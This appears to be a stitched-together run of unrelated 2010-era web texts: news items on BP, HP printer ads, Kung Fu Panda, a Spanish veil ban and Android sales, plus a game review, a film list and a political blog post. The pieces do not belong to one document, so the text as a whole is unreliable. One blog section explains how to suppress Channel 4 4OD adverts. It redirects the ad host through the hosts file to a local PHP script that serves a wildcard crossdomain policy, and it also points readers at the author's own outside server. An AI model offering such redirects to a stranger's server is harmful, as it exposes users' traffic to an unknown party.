IP addresses can be used to identify an approximate area where the Web - connected device is located , opening the potential for targeted advertisements based on location .
" Through IP ( Internet Protocol ) sniffing , you have an idea about where those printers are so naturally it allows you to kind of already target your offers , " Nigro said .
Ads can also be targeted based on a user 's behavior as well as the content , said Vyomesh Joshi , head of the HP's Imaging and Printing Group .
The pilot with Yahoo is in its early stages , however , and Joshi said the program has to be done with privacy in mind .
" That 's where we need to be very clear business rules in terms of privacy , " Joshi said .
Send news tips and comments to jeremy_kirk@idg.com
Tony Hayward , BP 's embattled chief executive , will risk incurring further wrath in the US over the Gulf oil spill tomorrow by defying calls from politicians to halt more than $ 10 bn ( £ 6.8 bn ) worth of payouts due to shareholders this year .
He will hope to appease City investors by promising in a conference call with analysts to stick with BP 's dividend policy amid mounting concern about a plunging share price .
BP declined to comment on its strategy tonight but it is understood that Hayward will say he is confident the company can pay for liabilities resulting from the Deepwater Horizon rig explosion – now estimated by analysts at $ 20 bn to $ 60 bn – as well as rewarding investors .
The move follows demands from senators Charles Schumer and Ron Wyden in a letter to Hayward all dividends be halted until the cost of the clean - up is known .
Analysts warned that committing to the dividend risked further political opprobrium in the US , with Alex Stewart from Evolution Securities fearing it could force Hayward to make a U - turn next month .
BP reports its results on 27 July , when it will announce the size of its next quarterly payout , but it is expected to spend more than $ 10bn in total dividends this year .
" The problem they have is that the oil is likely to be still flowing by the time they announce results , " said Stewart .
" It 's not going to look good paying about $ 3bn in [ quarterly ] dividends to shareholders if at the same time local fishermen are having their livelihoods destroyed in the Gulf . "
However , BP 's dividend is of crucial importance to the City and to the pensions of millions who depend on payouts from profitable companies to boost their retirement funds .
Together with rival Shell , BP accounted for 25 % of the total dividends of £ 50 bn paid in the UK market last year .
Any cut in the dividend could result in investors selling BP shares , further weakening the company , which has lost nearly 30 % of its value since the disaster began .
Crude oil has been leaking from a well at the bottom of the sea since 20 April and BP has been unable to stem the flow despite various attempts to halt it , including the " top kill " method of pumping mud and debris into the hole .
Hayward 's handling of the crisis has been called into question , and he chose Facebook to apologise for his latest gaffe : saying he wanted his life back .
His position has become more troubled since he said in an interview with the FT today that it was " entirely fair criticism " that BP was not fully prepared for the oil leak .
Analysts were today openly questioning the future of Hayward as chief executive , and whether his company could be taken over and broken up .
Bookmaker Paddy Power is now offering even odds that Hayward will be forced to leave his post by the end of this year , meaning two successive chief executives would have left earlier than originally intended .
Hayward 's predecessor John Browne departed following the Texas City fire which claimed 15 lives .
A screenwriter filed suit against DreamWorks Animation Thursday , claiming the studio cribbed his concept to create 2008 hit “ Kung Fu Panda . ”
In his Los Angeles Superior Court complaint , Terence Dunn is described as an “ Ivy League - educated Chinese - American writer - producer - teacher - philosopher , ” who pitched DreamWorks the idea about a kung fu-aspiring panda bear and his tiger , leopard , snake , crane , monkey and tortoise friends back in 2001 .
All of those characters would eventually wind up in " Kung Fu Panda , " which voice - starred Jack Black and went on to gross $ 631.7 million globally after it was released in June 2008 .
A sequel is slated for June 2011 .
However , Dunn – whose suit also claims he was a tai chi consultant for the Los Angeles Lakers in 2001 – said he was told in February 2002 that DreamWorks had rejected his concept .
DreamWorks officials had no comment .
Pamela Chelin contributed reporting to this story .
4OD Channel 4 television , on demand , for the UK
So 4OD has a great collection of TV series that you can watch back to back .
After watching about five episodes of peep show I found the adverts repetitive and annoying and decided to have a look at removing them .
A brief search on the net and I found Steve Larsen had found a method .
His instructions state that by redirecting three hosts to your loopback the adverts will not be played .
I did this and for some quick tests I found it to work .
My setup , following instructions
I set my router ’s parental control to redirect the following URL s to 127.0.0.1
s0.2mdn.net
realmedia.channel4.com
webstat.channel4.com
I did this in the hope that I would not have to reconfigure the hosts file on the various computers around my house .
Problem
I found that on machines that had viewed 4OD then adverts did not play but on machines that have never been to 4OD they hung while attempting to play and showed nothing but a blank screen .
Investigation
To investigate what was going on I disabled the redirect on my router and cookies and caching on a browser and ran up WireShark and captured the packets from a successful viewing of 4OD .
I used Jamie Does as a test .
The first packet of interest is this request to channel 4 .
http://www.channel4.com/programmes/jamie-does/4od/asset/3070154?1274958589
In the xml response there is a node “ adverts ” with a “ targeting Uri ” child that looks interesting .
http://realmedia.channel4.com/RealMedia/ads/adstream_sx.ads/channel4.newcu/channel4/channel4/c4food/48367/48367/006/1813730249
The next packet of interest is this request
http://realmedia.channel4.com/crossdomain.xml
Finally this request
http://realmedia.channel4.com/RealMedia/ads/adstream_sx.ads/channel4.newcu/channel4/channel4/c4food/48367/48367/006/1813730249@x59,x60,x61,x80,x81,x90,x91,x92,x93
The response contains a load of rtml urls interceded with remarks with clipping times .
Removing adverts solution , personal use .
So seeing as just looping back realmedia.channel4.com to localhost ends up with a hang if there is no cache of the final request then it will need to generate my own response using some php and some url re-writing on my local apache and php web server .
Set in hosts file 127.0.0.1 to be realmedia.channel4.com
127.0.0.1 realmedia.channel4.com
Setup url rewriting on local web server in .htaccess
RewriteRule ^crossdomain.xml $ /tv.php?cd=1 [ L ]
RewriteRule ^RealMedia\/ads\/adstream_sx\.ads /tv.php [ L ]
Generate a php page to service requests .
if ( isset ( $_GET [ 'cd ' ] ) ) {
echo '< ?xml version = " 1.0 " ?>'.
PHP_EOL ;
echo '<!
DOCTYPE cross-domain - policy SYSTEM " http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd " >'.
PHP_EOL ;
echo ' < cross - domain - policy >'.
PHP_EOL ;
echo ' < allow - access - from domain= " * " />'.
PHP_EOL ;
echo '< /cross-domain-policy >';
} else {
echo PHP_EOL ;
}
In the above requests for the crossdomain.xml are served normally however the rtmp links are not generated at all , these rtmp links are the locations of adverts to be played , non specified , non played .
An example of the crossdomain.xml
An example of the null advert file
Removing adverts solution , personal network .
Same as above except step 1 is not to alter hosts file but to setup a redirect to my server on my routers parental control .
So .
realmedia.channel4.com REDIRECT MyServerName
Removing adverts solution , solution for everyone .
I have enabled a static ip server I had admin rights over to provide the fake information required .
One can add a host entry ( c:\windows\system32\drivers\etc\hosts – launch notepad with admin rights ) for
realmedia.channel4.com
to point at
195.12.28.114
in the end it should look like something like this :
# Copyright ( c ) 1993 -2006 Microsoft Corp .
#
# This is a sample HOSTS file used by Microsoft TCP / IP for Windows .
#
# This file contains the mappings of IP addresses to host names .
Each
# entry should be kept on an individual line .
The IP address should
# be placed in the first column followed by the corresponding host name .
# The IP address and the host name should be separated by at least one
# space .
#
# Additionally , comments ( such as these ) may be inserted on individual
# lines or following the machine name denoted by a ' # ' symbol .
#
# For example :
#
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host
127.0.0.1 localhost
195.12.28.114 realmedia.channel4.com
Once done , open a command and tye nbtstat -R and ipconfig / flushdns or just reboot and yay no more ads .
Digital Track Digital Track Streaming + Download
Immediate download of Dancing Mad ( FINAL FANTASY VI ) in your choice of standard 320 k mp3 and AAC , or 24bit / 88.2k FLAC , ALAC , or any other format you desire .
Purchasable with gift card
The Spanish senate approved a motion on Wednesday urging Prime Minister Jose Luis Rodriguez Zapatero 's government to ban Islamic full - body veils in public places .
The vote , 131- 129 , was passed with the support of the conservative Popular Party and two smaller conservative regional parties , the CiU and UPN .
The motion specifically calls for a ban on the niqab , which leaves only the eyes uncovered .
Speaking to reporters after the vote , deputy leader of the Popular Party Maria Dolores de Cospedal called the vote " a very important step in favor of freedom and women 's equality . "
Political point - scoring
Zapatero's Socialists accused the Popular Party of political demagoguery
Zapatero's Spanish Socialist Workers '
Party had proposed an alternative text , supported by all other parties in the senate , that called for the government to " collaborate with Muslim communities , " work through education and use existing laws to " guarantee the respect of women 's dignity . "
The Socialists also accused the Popular Party of using the controversial issue for political gain , since the full - body veils are extremely uncommon in Spain .
Several Spanish municipalities - including Barcelona and several other cities in the northeastern autonomous region of Catalonia - have already introduced bans on Muslim full - body veils , or are planning to do so .
Immigration from Muslim - majority countries has been increasing in Spain since the 1990s .
About one million of Spain 's 47 million residents are Muslim , and many of them of Pakistani descent living in Catalonia .
Debates over the full - body veil ban are also raging in France - where parliament is to debate a cabinet - approved bill next month - and Belgium - where the proposal is awaiting approval from the upper house of parliament .
Author : Andrew Bowen ( dpa , AFP , KNA )
Editor : Andreas Illmer
Et si la France détenait une partie du remède à apporter aux États - Unis , aux prises avec la plus grave marée noire de l'histoire qui souille depuis plus de deux mois les côtes du golfe du Mexique ?
L'État de Floride , l'un des trois affectés , vient de faire l'acquisition , via une société privée , de neuf bateaux français fabriqués par la société bretonne Ecocéane , basée à Paimpol , dans les Côtes - d' Armor .
Valeur marchande : autour d'un million d'euros .
L'État de Louisiane pourrait en faire de même prochainement .
Si le premier bateau acheté est déjà à Miami , les huit autres quitteront le chantier de Paimpol à partir de jeudi .
Contrairement aux bateaux pompeurs traditionnels qui n'aspirent que 25 % d'hydrocarbures pour 75 % d'eau , la flotte d'Ecocéane n'" avale " que du pétrole - jusqu'à l'équivalent de 6.000 barils par demi-journée .
À la clé , un sérieux gain de temps , d'autant que les catamarans peuvent être reliés à des tankers afin d'évacuer le pétrole au fur et à mesure .
Bataille économique
Depuis plusieurs semaines , Jean - Louis Borloo , ministre de l'Écologie , du Développement et de l'Aménagement durables , s'est employé à favoriser les intérêts français dans la gestion de ce désastre écologique .
Le 4 mai , sur l'antenne de France Inter , il a justement nommément évoqué le cas d'Ecocéane , avant d'intervenir auprès des autorités américaines pour que les appareils de la firme bretonne soient testés .
Il faut dire que d'autres pays avaient été plus prompts à réagir .
C'est notamment le cas des Pays - Bas , du Danemark ou de l'Espagne , qui étaient , depuis plusieurs semaines , déjà sur le front de la marée noire , avec des technologies applicables sur terre seulement .
La PME de Paimpol propose , elle , la collecte de nappes du pétrole à la dérive en mer .
Ecocéane , cofondée en 2003 par Éric Vial , 48 ans , et son beau - père Robert Gastaldi , est présente dans une vingtaine du pays , de l'Australie jusqu 'au Brésil , ainsi que dans des empires pétroliers comme l'Angola ou le Nigeria .
Le 28 avril 2009 , son Catamar - un navire de récupération d'hydrocarbures et de déchets flottants de 55 tonnes et de 18 mètres de long - a été baptisé par Maud Fontenoy , vice - présidente du Conservatoire du littoral et marraine du bateau , en présence d'une délégation de l'Élysée et du ministère de l'Écologie .
Éric Vial , 48 ans , a cofondé en 2003 avec son beau - père Ecocéane © DR .
Whether you root for Google or Apple , it 's a heck of a horse race as Android beat the iPhone in first quarter U.S. sales , according to the NPD Group .
Android sales accounted for 28 percent of smartphone sales last quarter , NPD reports .
That puts Android ahead of the iPhone 's 21 percent , and within striking distance of Research in Motion 's BlackBerry , which took 36 percent .
It 's worth noting that while Android had a great quarter , it still lags behind RIM , Apple and even Windows Mobile for total market share , according to recent statistics from ComScore .
Google 's operating system had 9 percent of the market as of February 2010 , compared with the iPhone 's 25.4 percent , so Android wo n't catch up for a while , if at all .
Still , as my colleague JR Raphael noted when ComScore reported its numbers , Android 's growth is striking .
Not only did Android outsell the iPhone , but it 's the only smartphone OS whose unit share grew since the previous quarter .
The iPhone , meanwhile , is flat , while Windows Mobile , BlackBerry and WebOS quarterly sales share is in decline .
If this trend continues , Android will catch up to its competitors for total market share in a hurry .
But hold on , Android fanboys , before you claim a victory in the name of open source and open systems .
Understand that Android 's growth probably has more to do with aggressive sales and marketing by Verizon Wireless .
The carrier expanded its two - for - one promotion last quarter to include all smartphones , and increasingly , that means Android phones .
NPD analyst Ross Rubin said in statement that this kind of carrier promotion is always a crucial factor in smartphone sales .
Add the availability of Android phones on T - Mobile , Sprint and AT&T , and you 've got an easy recipe for more sales than a single phone ( iPhone ) on a single carrier ( AT&T ) .
With Verizon 's new Droid Incredible selling out in its debut week , and Sprint 's upcoming HTC EVO 4G gathering buzz as the next phone to beat , Android still has plenty of momentum .
NPD 's findings are just a milestone along Android 's ascent .
Activists who think the state ’s proposed ban on a chemical found in baby bottles and sippy cups does n’t go far enough testified at a hearing last week .
Members of the Alliance for a Healthy Tomorrow are pushing for regulations that would further restrict the presence of bisphenol A .
The chemical is used in a variety of products , including plastic bottles and the linings of canned food containers .
Studies of laboratory animals suggest the chemical could cause developmental problems for children if they are exposed to small quantities early in life .
Alliance members want the state to prohibit BPA in packaging for infant formula and baby food as well as all reusable food and beverage containers .
The Deval Patrick administration has proposed banning baby bottles and toddler sippy cups containing the chemical .
“ If the Department of Public Health allows a BPA regulation to pass with this limited scope of products , they will be allowing continued toxic contamination of vulnerable infants , ’’ Lee Ketelsen , New England codirector of Clean Water Action , said in a statement .
The organization is part of the alliance .
The US Food and Drug Administration has launched studies of BPA but it has not called for regulatory action .
Elizabeth Cooney
A greener space in Allston
Update : Here is Lee ’s full hour of footage :
Update : Iara Lee has posted 14 minutes of her footage from the Mavi Marmara :
Here is the description from her website Cultures of Resistance :
On the night of Sunday , May 30 , showing a terrifying disregard for human life , Israeli naval forces surrounded and boarded ships sailing to bring humanitarian aid to the blockaded Gaza Strip .
On the largest ship , the Mavi Marmara , Israeli commandos opened fire on civilian passengers , killing at least 9 passengers and wounding dozens more .
Others are still missing .
The final death toll is yet to be determined .
Cultures of Resistance director Iara Lee was aboard the besieged ship and has since returned home safely .
Despite the Israeli government ’s thorough efforts to confiscate all footage taken during the attack , Iara Lee was able to retain some of her video recordings .
[ Above ] is 15 minutes of raw footage from the moments leading up to and during the Israeli commandos ’ assault on the Mavi Marmara .
Something interesting about the games from Spiderweb Software : I have been fortunate enough to be on the beta - test teams for the last few iterations of both the Mac and PC releases of the Geneforge and Avernum games .
This means having access to the code early , getting loads of play time in before release … and yet in all cases I find myself writing reviews months later .
I attribute that to the difference between playing to test for issues , and playing as a gamer figuring out what I do or do n’t like about the overall experience .
So here I am in May reviewing a game that was released in November for the Mac and January for the PC , finally replaying a game that I put hundreds of hours into testing .
Since November
I have been very clear to anyone who asked – this is an excellent game , and is well worth buying .
Now I am finally getting around to finishing up my replays and adding more details to my ‘it ’s great , buy it ’ recommendation .
The Avernum series is known for huge subterranean worlds , epic stories , tons of quests and combat played out in turns .
The major conflict is between the Avernites and the over - world people of the Empire .
Avernum was originally a colony formed by outcasts from the surface world , but over the years it became its own world , with loads of people born and raised without ever visiting the surface .
In terms of history , Avernum grew out of the original Exile games from Spiderweb Software , and indeed the first three games in the series are largely remakes if the original Exile games with loads of added quests and characters and encounters , broader stories with more dialogue , and a fully revamped graphical presentation and interface .
The last three games are entirely original , but the core conflict of Empire versus Avernum remains .
For Avernum 5 you actually came from the surface at the behest of the Empire .
But in the latest game you are once again an Avernite , leading a group of soldiers .
The game features a huge story filled with mystery , intrigue and twists .
Along the way you meet wonderfully realized characters and situations , get involved in local disputes , take care of trivial tasks for small rewards , and explore the world looking for a fight .
This synergy of possibilities makes the game shine .
You are rarely forced to do a task at a certain time , but the pull of the main quest keeps you on track better than many other games .
At the beginning of the game you create your party , selecting four characters amongst a variety of classes and races , each with their own advantages and disadvantages .
Each character gets a range of attributes and skills , and there is a great amount of depth to the character development system throughout the game .
You will get enough points to be effective but will always be wanting more !
Setting up a proper party is critical to success , as it is easy to become to heavy in melee or magic or ranged skills and leave out healing and other critical class types .
The game suggests a party , which is reasonably well balanced and a good starting place for new players .
While you do set up your party members with an avatar , Avernum is not the sort of game where you ’ll be tweaking eyebrow distances on your character .
There are a few options and that is it .
It is the sort of thing that really bothers some people , so I want to make sure that no one is expecting to have the level of character customization you ’ll find in Oblivion or Mass Effect … or Baldur ’s Gate .
After making large improvements to the combat system in Avernum 5 , Vogel turned his attention to balancing and streamlining things for Avernum 6 .
Combat is still turn - based , and when you approach an enemy you switch from real - time to turn - based and everything pauses .
Each combatant takes their turn , and can move , perform a standard attack , use a battle discipline or spell , use items , and so on .
There is a parry skill to counter enemy attacks , and so on .
Jeff Vogel has spoken quite a bit about reducing the ‘ trash collection ’ – those filler battles that provide much less in rewards than the effort they seem to take .
Too often that ‘ grinding ’ is to get you pumped up with enough skills and experience to face the cool boss battles everyone wants to experience .
His goal was to keep combat as a main element of the game , but not have it so frequent that it becomes a tedious grind .
With the last Geneforge game he made a step in the right direction with pacing and balancing , but it is really in Avernum 6 that we finally see the realization of that goal .
One thing he knew was that he beta testers were generally experienced hardcore gamers , and that he needed to ratchet the game down to where they started complaining about it being a bit too easy in order to hit the right level for most folks to play at ‘ normal ’ difficulty .
There are a few other ways ways that balancing is enhanced : the most obvious is making sure that every skill is useful from start to finish , and nothing becomes too overpowered .
Many games start you off getting chased by kittens and ends you up taking down elder dragons with a single hit .
Vogel makes the game challenging from start to finish .
And , in a tactic that has been used effectively in recent years by games such as Neverwinter Nights 2 , you will often find yourself as part of larger battles obviously beyond your ability to handle as a group of four adventurers .
These provide tension and excitement without forcing you into a die - and - retry grinding loop .
While I do n’t pretend to be a hardcore gamer , I have now managed to finish the game on both my Mac & PC without having my entire party die a single time .
I have certainly come close , and perhaps it is n’t fair to say I have n’t failed since I * have * quit and reloaded a couple of times when defeat was inevitable .
But in general I found the difficulty quite consistent and reasonable at the ‘ hard ’ setting for myself .
I really just have to reiterate how satisfying to play a well - balanced game .
The most recent games in the Avernum and Geneforge series also share at their core a new engine created by merging the two engines , and greatly enhancing it along the way .
While these are clearly ‘ old school ’ and ‘ indie ’ in their appearance by almost any standard , looking at screens from earlier games shows just how far he has come in the last few years .
The world is huge and varied in looks and terrain , with plenty of interior and exterior regions to explore .
Unlike many games where entering a building requires a load screen for a small area , everything is continuous in the world of Avernum .
There are dungeon areas that are loaded in , but the load is nearly instantaneous and the resulting area is massive .
The large overarching story is with you at all times , given out in chunks of quests by a variety of characters throughout the game .
Historically the Avernum games have been very linear in terms of main quest , with the side quests filling in much of the variety .
There is still some amount of ‘ gating ’ , wherein you cannot access new areas without completing the existing quest tree – but the majority of the game gives you extensive freedom to not only explore the massive world , but also in how you go about accomplishing quests .
There is still a huge amount and variety in the side - quests available in Avernum 6 , and as is true with most RPGs they represent much of the ‘ flavor ’ and interest of the experience .
Most of the side - quests are fairly simple and single - tiered , but there are some that are more complex and require thought and planning .
There are also quests with repercussions , where you can for example succeed at killing off bandits but fail to protect the captives you were meant to save !
One thing I have always loved with the Spiderweb games is they are fairly ‘ family friendly ’ .
They are not meant for children , but the story and characters are comparable to those found in teen - level reading material such as the Eragon or Harry Potter books .
There is pain , emotion and pathos laced with humor throughout this wonderful tale .
This is a game for very strong readers , forming the basis of the 10 + age recommendation .
The subject matter is somewhat dark and scary , but nothing beyond what a middle school kid can handle .
I originally thought my kids would hate Spiderweb games .
Between the old - school graphics , the lack of dramatic voice acting and sweeping music found in so many of the games they play on their Wii , PS2 , PC , PSP and Nintendo DS , I thought they would n’t be interested .
Also , the text heavy storytelling is not something that kids raised on the adventures of Mario and Zelda generally gravitate towards .
But , almost as if 2005 ’s Fate had acted as a ‘ gateway drug ’ , they immediately became interested while watching me play , asking questions , making suggestions , and getting excited as I entered combat in one of the mines and suddenly was surrounded and outnumbered .
Their reactions to the characters and dialogue illustrated just how well written the game is .
One character ’s reaction to my party caused my younger son to adopt a Jar Jar Binks accent and say ‘ How Rude ! ’
They have each taken some time working their way through parts of the game .
My older son loves the combat system , while my younger son appreciates that losing one or two of your party during a battle only leaves them unconscious until you can return to a town to revive them .
Avernum 6 is a wonderful close to a wonderful game series .
Full of interesting characters , great writing , humor , drama , fun sidequests , and more , the game rewards gamers who stick it out through the end – and very much rewards those of us who have been along for the ride since the start .
Netbook Gamer Perspective : Jeff Vogel and Spiderweb Software are the classic Indie RPG developer , having been at this since 1994 .
The Avernum remake of the Exile games has been a big part of the resurgence in PC RPG games in the wake of the early 2000 ’s developer exodus to consoles , and Vogel has shown the ability to stand alongside the big developers and come out looking favorably .
This classic conclusions should appeal to all RPG fans .
– Digital Download / CD version ?
– Avernum 6 is generally sold as a downloadable game , but there are CD versions available – they are simply the download installer put on a disk .
– Installation Notes :
The game is in a single downloadable file and installs very quickly .
The default install is a large demo , which you then unlock by registering .
– Disk Space Requirements : full - install takes ~ 105MB .
– CD Required to Play ?
No .
– Control Considerations ?
The game shows you all of the keys for all actions .
– Will it run on a VIA C7 ?
Yes !
– Will it run with 1GB RAM ?
Yes !
– Special Considerations for running in Windows XP / Vista / Win 7 ? Avernum 6 works great on all modern operating systems .
– Compatible versions for other OS such as Linux or Mac OS ?
The Mac version is always developed and released before the PC version .
– Notes on the Digital Version :
The full version is simply unlocked from the demo , which makes life simple .
Conclusion :
One of the best role - playing games of the last year the game can be learned in minutes , but allows depth of control that defies mastery .
It pulls you into extended gaming sessions , yet the journal is clear enough that you can walk away for quite a while and then hop back into it effortlessly .
It runs on just about any Mac or PC and is available as a small download , making it easy to try out .
What Avernum 6 lacks in visual presentation , it makes up with immersive story - telling and engaging gameplay .
On the day that MacGruber hits theaters , news comes our way that Jason Richman has been hired to write the script for New Line / Warner Bros . ’
MacGyver movie .
“ MacGyver ” was a science - oriented adventure series that ran from 1985 - 92 on ABC .
Richard Dean Anderson , later of “ Stargate : Atlantis ” and “ SG - 1 ” fame , starred as an incredibly resourceful secret agent for the Phoenix Foundation who frequently would escape from dangerous situations with ingenious and lightning - quick engineering trickery .
Richman has worked on films including Black Hawk Down , Rush Hour 3 , Bad Company and the proposed Beverly Hills Cop 4 .
Raffaella De Laurentiis is producing through her Raffaella Productions along with Martha De Laurentiis and series creator Lee Zlotoff .
Dino De Laurentiis is executive producing .
We have already published a number of lists which focus on actors or films that were passed over for Academy Awards .
This list looks at performances of male and female actors that were at least good enough to have been nominated but were n’t .
They are n’t all winning performances but certainly they were great performances .
10 Sean Astin The Lord of the Rings : The Return of the King ( 2003 )
He ’s as effective in the third film as McKellen is in the first .
As Samwise Gamgee , Astin makes you care for his and Frodo ’s well being throughout the film .
When the strength of the film causes the audience to despair right at the end , and several times before , Astin ’s strength keeps it holding on just like Frodo .
He ’s the only character with the honesty to be able to take the Ring and then give it right back .
He hits all the right notes of heroism , dejection , hope , fear , courage , and he does it with such richness , some critics have conjectured a bit of homosexuality between him and Frodo ( not true ) .
9 Gary Oldman Air Force One ( 1997 )
An actor of diverse roles , and he certainly deserved a nomination for his performance as Dracula .
He disappears into every character , and his work as the villain Ivan Korshunov is among his very best .
It is n’t easy being a formidable villain to Harrison Ford ’s hero , but Oldman pulls it off .
He truly makes you hate him and want to see Ford take him out , but the real merit of his characterization is in the complicated politics motivating him .
He is n’t hijacking Air Force
One because he hates the President .
He ’s hijacking it to free a political ally and terrorist .
The scene in which Oldman interrogates , beats up , and attempts to coerce Ford into freeing the rogue Kazakh politician is one of the great acting duels in film , and Oldman steals the show with his quiet rage .
8 Thomas Wilson Back to the Future ( 1985 )
This 1980s pop icon of film bullydom was unjustly passed over for an Oscar nod at least once .
His performances as Biff Tannen in the other two films of the trilogy are perhaps just as good .
Wilson is actually a really nice guy , with a wife and children .
He based his characterization on all the bullies he ever knew as a kid , and the work shows through very well .
Not only is he big and mean , he ’s very stupid , and makes for great slapstick when he gets decked .
He ’s the character the audience remembers when it leaves the theater .
7 Michael Keaton Beetlejuice ( 1988 )
In terms of bravura performances , this one is the wildest .
Keaton did a good turn a year later as Batman , and decided to go the opposite way from this performance .
He pulls out all the stops as a “ freelance bioexorcist . ”
It ’s Keaton ’s effortless delivery of a lot of very funny lines that land him a spot on the list .
In essence , he IS this film .
Every scene he ’s in is great because of his flamboyance .
Though the film is full of dead people , it is n’t meant to be scary , and Keaton ’s humor pushes it into success in grand style .
6 Oliver Reed Oliver ! ( 1968 )
http://www.youtube.com/watch?v=cw_ETnxuBys
His performance as Bill Sikes in this musical version of Oliver Twist is , in this lister ’s opinion , one of the top five villainous performances in cinematic history .
It was Reed ’s idea not to sing any songs , although Sikes has at least one song in the stage version of the musical .
Reed believed that as soon as he started singing , he would cease to be scary .
He is , in truth , terrifying in every scene .
It ’s his eyes .
He looks as if he ’s ready – indeed jubilant – to kill everyone he encounters .
Even Fagin is scared of him .
His pet dog , Bullseye , is so scared that it remains in tow until the end , when Sikes bludgeons Nancy to death .
Reed stands up with a look of the seediest , most toxic rage on his face of just about any film villain .
Now even Bullseye wo n’t come near him .
He growls , “ Bullseye !
Bullseye , you come here ! ” with such violence in his facial expression and body language that the audience is sure he ’ll kill everyone he meets from now on .
5 Dennis Hopper Blue Velvet ( 1987 )
By far one of the most over - the - top villains in film .
The Academy may have passed Hopper over for this role because he was nominated in the same year for his supporting performance in Hoosiers .
His performance as Frank Booth may have been deemed a leading role , but Kyle MacLachlan and Isabella Rossellini are billed at the top .
Hopper ’s performance is beyond belief .
His character , Frank Booth , is mentally deranged , sadistic , masochistic , and tortures Rossellini physically , psychologically and emotionally , throughout the film .
He puts on a gut - wrenching spectacle and all eyes are drawn to him , whether they like it or not .
In the script , the gas he inhales was supposed to be helium .
Hopper knew his way around drugs and decided to use amyl nitrate , which is used properly as an angina medication .
Hopper actually inhaled it throughout production to get the proper characterization .
By the time he ’s shot dead , the audience has seen enough to cheer .
4 Robert Shaw Jaws ( 1975 )
This modern - day Captain Ahab is so mesmerizing once he shows up that the viewer no longer pays much attention to Scheider or Dreyfuss , who both put forth fine work in this film .
Shaw was thoroughly wasted on beer and whiskey in most of the scenes , but somehow , it made him focus .
Quint destroys his radio to keep anyone else from nabbing the shark .
He is ready to wreck his boat and kill his crew to get the shark .
He tries everything in the book and sings sea shanties the whole time .
His USS Indianapolis speech is horror distilled .
It efficiently kills the cheerful mood of the men stripping their sleeves and showing their scars .
The speech alone would net him a spot on such a list , and it explains to the audience why Quint is so madly devoted to catching and killing the shark .
It also foreshadows his death .
And for anyone watching the film who does not fear the shark as a realistic predator , this speech makes it real , because it ’s 100 % true .
A masterpiece of characterization .
3 Carol Burnett Annie ( 1982 )
Burnett is one of the greatest comediennes in film , and she outdid herself in this musical .
She plays Miss Hannigan , the evil proprietor of a girls ’ boarding school , who treats the girls like garbage , forcing them to clean and clean again , “ until the floor looks like the top of the Chrysler Building . ”
She ’s a falling - down drunk , and wears her hair half down her face , her lipstick half up her face , staggering around the building cursing the children .
Burnett gives a fine , colorful flair to it all .
By the end , she turns good , wishing no harm on a little girl like Annie .
Burnett makes it work from beginning to end .
By far her best line is three words long , after she walks into a room , hearing the girls at play , “ Was that …laughter ? ”
She looks positively offended by the possibility .
2 Al Pacino The Devil ’s Advocate ( 1997 )
If you ’ll pardon the pun , Pacino puts on one hell of a bravura show as the ultimate Evil One .
This is the most accurate portrayal of Satan in film to date .
The various incarnations over the years have painted him as everything from Jason Voorhees to an inane rascal of a trickster .
Pacino does it right .
The Devil ’s the head of a lawfirm .
This film is probably quite popular among lawyers .
He ’s been around for thousands of years , and now he feels it ’s time to make the Antichrist and take over everything .
Enter “ Cool Breeze ” Reeves , who actually does himself proud in this one .
He ’s not bad at all .
Pacino , though , steals every scene .
He goes down in film history as the Devil of all devils near the end , when Reeves still wo n’t join the dark side of the force .
He still loves his recently deceased wife .
Pacino asks him , “ Who are you carrying all those bricks for , anyway ?
GOD ?!
Is that it ?!
God ?!
Well , I ’ll tell ya .
Lemme give ya a little inside information about God . ”
What follows is some of the most awe - inspiring misotheism in cinemas , all the more affecting because , except for the bias involved in what he says , just one side of the story , it ’s quite an accurate description of what God has done ( if you believe in Him ) with mankind , how unfairly mankind has had it , etc .
This is Satan as he truly is ( if you believe in him ) , and Pacino does him so proud , the audience is left wondering what the real Satan might think of the performance .
1 Irma P. Hall The Ladykillers ( 2004 )
When this lister saw her performance , he made the mistake the rest of the Academy made : he forgot that he was looking at an acting performance .
That ’s the greatest praise an actor can be worth .
Hall ’s portrayal of Mrs. Marva Munson is worthy of recognition alongside Brando’s of Vito Corleone , Peck ’s of Atticus Finch and any other legendary performances one cares to think of .
This lister considers Spencer Tracy the greatest film actor because he consistently did just that : made the audience forget it was watching a performance .
The effortlessness involved in pretending to be someone else and speak prescribed lines is the hardest thing for any actor to do .
Hall does it just as well , even upstaging Tom Hanks , who is certainly not bad in this film .
It ’s hard to pin down her best scene , but the last scene , with the sheriff and deputy , discussing the stolen money is perhaps the most charming .
She is , indeed , genuine , sincere , honest , and wholly disarming of the audience ’s suspension of disbelief , from her first scene to her last .
This is one very rare time when the lister believes that not only should she have been nominated for Best Supporting Actress , she should have won .
Personally , I am using the November elections as my cut - off mark .
Either the Senate has passed DADT repeal - which is n't even really repeal - and ENDA has been enacted , or all bets are off in terms of me voting for Democrats in November .
The boyfriend is pretty much of the same mind and equally disgusted .
Meanwhile , the Uncle Tom - like suck - ups at HRC and other alleged LGBT rights organizations continue to act as if they were paid cheerleaders for the Obama administration .
It 's a sad state of affairs and - at least for me - extremely demoralizing .
Nancy Pelosi has announced that there will be no movement on efforts to pass ENDA until the Senate acts of the so - called " repeal " of DADT .
Which , given the fact that there 's no guarantee of when the Senate will take up DADT much less pass it , means that there 's no guarantee that ENDA will see movement this year .
While Joe Solmonese and other self - styled " leaders " of the LGBT community gush that Obama is the best pro-gay president ever , the reality is that it takes almost nothing to win that title given the abysmal track record of Obama 's predecessors .
And while Obama may have appointed more gays to federal positions than any predecessor , for the vast majority of us in the LGBT community , in most states we still have no employment non-discrimination protections , our relationships are not recognized , we face religious based bigotry , cannot serve openly in the military , and in numerous other ways we are clearly second or third class citizens .
Yes , the passage of federal hate crimes legislation was nice , but actually impacts only a few in the LGBT community .
As a result , I 'm not sure what there is to gush about if you are not part of the inside the beltway professional gay rights clique like Solmonese .
Here are some highlights from the Washington Blade of Nancy Pelosi 's disingenuous double speak :
U.S. House Speaker Nancy Pelosi ( D - Calif. ) on Friday said that a vote on the Employment Non-Discrimination
Act would n't take place until Congress completes legislative action on " Do n't Ask , Don't Tell . "
During her weekly press conference , Pelosi > said in response to a Blade inquiry on ENDA 's prospects that lawmakers " still have to finish ' Do n't Ask , Don't Tell . ' "
Referencing the successful House vote May 27 to attach repeal to Defense Department budget legislation , she said , " And now , of course , we 'll go -- after the bill passes in the Senate -- we 'll go to conference .
But our work is not finished in that regard , so one thing at a time . "
